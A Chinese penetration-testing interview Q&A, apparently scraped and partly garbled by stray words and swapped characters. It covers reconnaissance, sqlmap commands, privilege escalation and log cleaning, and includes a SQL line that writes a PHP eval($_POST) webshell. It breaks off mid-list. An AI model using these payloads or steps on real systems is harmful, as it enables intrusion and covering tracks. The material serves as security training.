给你一个网站你是如何来渗透测试的?php
在获取书面受权的前提下。
1)信息收集,
1,获取域名的whois信息,获取注册者邮箱姓名电话等。
2,查询服务器旁站以及子域名站点,由于主站通常比较难,因此先看看旁站有没有通用性的cms或者其余漏洞。
3,查看服务器操做系统版本,web中间件,看看是否存在已知的漏洞,好比IIS,APACHE,NGINX的解析漏洞
4,查看IP,进行IP地址端口扫描,对响应的端口进行漏洞探测,好比 rsync,心脏出血,mysql,ftp,ssh弱口令等。
5,扫描网站目录结构,看看是否能够遍历目录,或者敏感文件泄漏,好比php探针
6,google hack 进一步探测网站的信息,后台,敏感文件
2)漏洞扫描
开始检测漏洞,如XSS,CSRF,sql注入,代码执行,命令执行,越权访问,目录读取,任意文件读取,文件下载,文件包含,
远程命令执行,弱口令,上传,编辑器漏洞,暴力破解等(可用扫描工具AWVS 、AppScan 、御剑、啊D、SQLmap等)
3)漏洞利用
利用以上的方式拿到webshell,或者其余权限
4)权限提高
提权服务器,好比windows下mysql的udf提权,serv-u提权,windows低版本的漏洞,如iis6,pr,巴西烤肉,
linux脏牛漏洞,linux内核版本漏洞提权,linux下的mysql system提权以及oracle低权限提权
5) 日志清理
6)总结报告及修复方案mysql
sqlmap,怎么对一个注入点注入?
1)若是是get型号,直接,sqlmap -u "诸如点网址".
2) 若是是post型诸如点,能够sqlmap -u "注入点网址” --data="post的参数"
3)若是是cookie,X-Forwarded-For等,能够访问的时候,用burpsuite抓包,注入处用号替换,放到文件里,而后sqlmap -r "文件地址"
布尔和延时注入的共同点?
都是一个字符一个字符爆出来的,耗费时间,都没有显示位,都要ASCII 码推算。linux
如何拿一个网站的webshell?
上传,后台编辑模板,sql注入写文件,命令执行,代码执行,
sql注入写文件都有哪些函数?
select '一句话' into outfile '路径'
select '一句话' into dumpfile '路径'
select '<?php eval($_POST[1]) ?>' into dumpfile 'd:\wwwroot\baidu.com\nvhack.php';web
如何防止CSRF?
一、验证 http referer(它记录了这次http请求的来源地址)
二、验证 token 正则表达式
三、使用验证码sql
owasp top 10 漏洞都有哪些?shell
2017年:
1、注入
2、失效的身份认证
3、敏感信息泄露
4、XXE
5、失效的访问控制
6、